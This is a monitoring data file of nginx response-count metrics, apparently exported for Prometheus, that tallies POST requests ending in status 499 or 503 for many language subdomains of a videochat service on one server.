nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="su.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="su.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tg.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="th.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="tl.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="udm.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="uk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ur.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="vi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="vi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="xh.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="yi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="zh.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="161.97.120.25"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="af.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="af.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="al.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="al.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="am.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="am.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ar.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ar.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ar.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="az.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="az.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="az.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ba.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="be.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="be.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="be.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bg.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bn.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ca.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ca.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ca.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="chm.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="chm.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="da.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="da.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ee.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ee.videochat.tv.br"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="el.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="el.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="en.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.show"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.show"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fa.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fa.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fr.videochat.show"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fr.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fr.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ga.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ga.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gu.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gu.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="he.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="he.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="he.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="id.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="id.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.show"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.tv.br"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jv.videochat.show"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kk.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kk.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kk.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kn.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kn.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ky.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mg.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mg.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mg.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mi.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mi.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mi.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mk.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mk.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mk.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ml.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ml.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.show"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mrj.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mrj.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ms.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ms.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ms.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="my.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="nl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="nl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="nl.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pa.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pap.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.show"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pt.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ro.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ro.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ro.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sco.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sco.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="si.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="si.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sk.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sk.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sk.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sr.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sr.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sv.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sv.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sw.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ta.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="te.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tg.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tg.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="th.videochat.world"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tl.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tl.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tl.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tr.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tr.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tt.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="tt.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="udm.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uk.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ur.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ur.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="uz.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="vi.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.cafe"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.date"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.show"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.tv.br"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="vmi460104.contaboserver.net"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="www.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="www.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="xh.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="xh.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="xh.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="yi.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="zh.videochat.date"} 2 